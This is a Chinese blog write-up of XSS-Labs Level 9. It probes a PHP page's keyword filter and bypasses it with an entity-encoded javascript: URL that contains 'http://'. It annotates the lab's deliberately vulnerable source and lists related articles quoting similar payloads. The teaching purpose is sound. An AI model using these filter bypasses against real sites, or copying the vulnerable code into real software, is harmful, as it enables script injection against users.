XSS LABS - Level 9 过关思路

最新推荐文章于 2024-08-30 06:00:00 发布
最新推荐文章于 2024-08-30 06:00:00 发布
阅读量455 收藏 9
点赞数 6
分类专栏: 网络安全 # 网络安全靶场笔记 文章标签: xss 前端 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73360524/article/details/141505961
版权

关注这个靶场的其他相关笔记:XSS - LABS —— 靶场笔记合集-CSDN博客

0x01:过关流程

进入关卡,右击页面,查看源码,搜索关键词 not bad!,查看页面回显点:

源码中显示链接不合法,我们传递一个合法的链接看看:

往合法的链接中添加不合法内容,尝试闭合<a> 标签,进而进行 XSS 攻击:

 http://www.baidu.com" onmouseover="alert(1)

可以发现,又被过滤了。下面测试一下当前页面的过滤规则:

PayloadEcho PrintAnalysis Note
http://http://这个是能回显的最低要求
HTTP://http://证明后端对传入的数据都转换为了小写字符
http://'http://'未过滤 '
http://"http://&quot" =>&quot
http://onhttp://o_non => o_n
http://scripthttp://scr_iptscript => scr_ipt
1http://1http://看来是字符串中包含 http:// 就让过哈

找到规则漏洞了,后端检测的是字符串中只要包含 http:// 就给过,虽然 script 给过滤了,但是,Level 8 中我们已经有经验了,上字符编码(单引号还没被过滤,天助我也):

 java&#115;cript:alert('http://')

0x02:源码分析

下面是 XSS LABS Level 9 的源码,以及我对其的部分笔记:

 <!DOCTYPE html><!--STATUS OK-->
 <html>
 ​
 <head>
   <meta http-equiv="content-type" content="text/html;charset=utf-8">
   <script>
     // 修改 alert 默认行为,跳转到下一关
     window.alert = function() {
       confirm("完成的不错!");
       window.location.href = "level10.php?keyword=well done!";
     }
   </script>
   <title>欢迎来到level9</title>
 </head>
 ​
 <body>
   <h1 align=center>欢迎来到level9</h1>
   <?php
   ini_set("display_errors", 0);
   $str = strtolower($_GET["keyword"]); // 将 keyword 传递过来的参数,全部变为小写
   // 过滤内容:script、on、src、data、href、"
   $str2 = str_replace("script", "scr_ipt", $str);
   $str3 = str_replace("on", "o_n", $str2);
   $str4 = str_replace("src", "sr_c", $str3);
   $str5 = str_replace("data", "da_ta", $str4);
   $str6 = str_replace("href", "hr_ef", $str5);
   $str7 = str_replace('"', '&quot', $str6);
   echo '<center>
 <form action=level9.php method=GET>
 <input name=keyword  value="' . htmlspecialchars($str) . '">
 <input type=submit name=submit value=添加友情链接 />
 </form>
 </center>';
   ?>
   <?php
   if (false === strpos($str7, 'http://')) { // 这里就是问题:strpos($str1, $str2),返回 $str2 在 $str1 中第一次出现的位置,如果没有找到,则返回 false
     echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>';
   } else {
     echo '<center><BR><a href="' . $str7 . '">友情链接</a></center>';
   }
   ?>
   <center><img src=level9.png></center>
   <?php
   echo "<h3 align=center>payload的长度:" . strlen($str7) . "</h3>";
   ?>
 </body>
 ​
 </html>

SRC_BLUE_17
关注
专栏目录
xssgame第九至第十
学习
10-08 2139
第九 这一,我发现无论我输入什么,都是不合法链接 另外,"和>都被过滤了 两项对比 只是少了一个http,就显示不合法链接,问题就出在 http:// 这个身上 所以我们要在输入的语句中添加http:// 比如javascript:alert('1')//http:// ...
XSS LABS - Level 20 过关思路
最新发布
Blue17 の 小窝
08-31 2440
函数,是 ActionScript 中一个非常重要的函数,用于在 Flash 应用程序(即 ActionScript 环境)和宿主页面(通常是 HTML 页面,其中包含了 JavaScript)之间进行通信。进行逆向了,逆向工具为 JPEXS,该工具的初始安装教程我放在了 Level 19 的过关流程中了,不会配置的小伙伴可以去看看(后续我会单独出一期,JPEXS 工具的简介)。文件中的代码,以及我对其的笔记,代码不多,笔者也是借助 AI,慢慢做的注释(笔者也没搞过 Flash,硬搞吧。
XSSxss-labs-level9
Hugu
02-23 718
文章目录0x01 XSS-Labs0x02 实验工具0x03 实验环境0x04 实验步骤0x05 实验分析0x06 参考链接 0x01 XSS-Labs   XSS(跨站脚本攻击)是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。   XSS按照利用方式主要分为:反射型XSS、存储型XSS、DOM型XSS。反射型XSS是攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的
XXS level9
weixin_33887443的博客
03-24 281
(1)查看PHP源代码 <?php ini_set("display_errors", 0); $str = strtolower($_GET["keyword"]); $str2=str_replace("script","scr_ipt",$str); $str3=str_replace("on","o_n",$str2); $str4=str_replace("src...
XSS-Game level 9
热门推荐
wangyuxiang946的博客
07-08 1万+
xssgame9,XSS-Game第九过滤的很严 , 使用编码绕过
xss-labs之level9、level10
weixin_51520483的博客
05-28 322
它接受两个参数:要搜索的字符串(主字符串)和要查找的子串。如果找到子串,则函数返回子串在主字符串中首次出现的位置(从 0 开始计数);,但是并没有过滤HTML实体编码,所以我们还是使用编码绕过,但是传入的参数需要有‘http://’,所以在payload后面加上,并注释。发现有隐藏传参数t_link、t_history、t_sort,但input属性是hidden,所以需要修改为text属性。尝试了之前的payload,发现都不行,看源码发现多了个。发现并没有输入框,跳转链接,查看页面源码。
XSS LABS - Level 19 过关思路
Blue17 の 小窝
08-30 1464
要想完成本,需要下载 Flash,不然就会出现下面的情况:访问链接,点击 ”立即下载“,即可下载 Flash 游戏浏览器的安装包。在安装 Flash 游戏浏览器之前,需要先闭本机的杀毒软件(好家伙,病毒是吧),俺不知道有没有毒哈,没有闭的话直接下载会被系统干掉。
xss-labs靶机通
weixin_63083809的博客
07-29 581
xss-labs
xss-labs搭建及通攻略
K_ShenH的博客
02-03 1万+
xss-labs搭建 (1)首先当然是需要phpstudy的环境,所以要先下载安装phpstudy。 (2)然后到github的网址中下载源码的压缩包。 下载链接:GitHub - do0dl3/xss-labs: xss 跨站漏洞平台 (3)下载后解压缩到phpstudy目录下的WWW子文件夹中,把压缩包的名字改成xss-labs。 (4)然后在输入url HTTPS://127.0.0.1/xss-labs/就可以访问靶场。 xss-labs通攻略 level...
xss-labs 通教程
SkyWT 的博客
07-05 2062
XSS 攻击历久弥新,目前 XSS 漏洞依然广泛存在。其核心在于找到注入点并通过 payload 让浏览器执行 js 代码。注入点不仅可以来源于用户提供的文本(请求参数或后端存储的字段),也可以是 Referer、UA、Cookie 等。通过<script>标签。通过元素的 onmouseover 属性。通过<img>的 onerror 属性,如。通过 URI,如。一般来说,使用 PHP 的函数能够防御很大一部分 XSS(注意过滤单引号)。许多字符过滤上的漏洞都是没有使用。
光棍节程序员闯秀_第九解密内容
11-18
光棍节程序员闯秀_第九解密内容,中间的解题结果放在附件中,方便大家来对照。
xss-labs/level9
m0_71299382的博客
11-29 322
xss-labs/level9
[网络安全]xss-labs level-9 解题详析
等风来
08-04 2558
Burp Suite 的 “Encoder” 模块允许用户对数据进行各种编码和解码操作,以进行安全测试、漏洞利用或其他目的。而将 JavaScript 代码放在 href 属性中,当用户点击具有此链接的元素时,浏览器会执行其中的 JavaScript 代码。Burp Suite 中涉及到编码和解码的模块是 “Encoder”(编码器)。该题与 level-9 的区别是,加上了对地址的判断。也就是说我们填入的内容存在于。
xsslabs第九
weixin_63750160的博客
03-04 418
显示我的链接并不合法。
XSS-9注入靶场闯(小游戏)——第九
qq_39330735的博客
02-04 642
XSS-9注入靶场闯(小游戏)——第九,绕过后台字符串过滤,找出过滤条件,夹带过滤条件进行Payload
当黑客就入门 XSS-Lab第九
Tuye的博客
07-21 680
第一:判断是否存在注入漏洞 第二:尝试利用该漏洞 所以构造Payload,使用html实体编码,引入正常的url并对此进行注释 javascri&#x0070;t:alert(1)/*http://www.baidu.com*/ ...
xss-labs通记录(level6~9)
qq_39670065的博客
07-24 664
level-6 老样子,在输入框使用<script>alert('xss')</script>进行尝试 输入框显示为<scr_ipt>alert('xss')</script> 查看源码 会发现和Level-5很相似 尝试用"onfocus=javascript:alert('xss') " 在value参数值处"o_nfocus=javascript:alert('xss') " 再就是 ...
搭建学习环境(九)——XSS-labs安装以及解题思路
baynk的博客
11-21 8137
0x00 xss-labs 一个专门练习xss的漏洞平台,似乎现在github中也无法下载了,不晓得在什么时候下的,收集了一份,等这个弄完了就准备去系统学习docker了。 安装其实没啥好说的,用之前的环境扔进去就可以用了,cwth。 xss-labs一共有level 20,尽力去做着看看,GOGOGO。 0x01 Level 1 without filter 看了好半天才看出来是啥意思。。...
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

SRC_BLUE_17

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值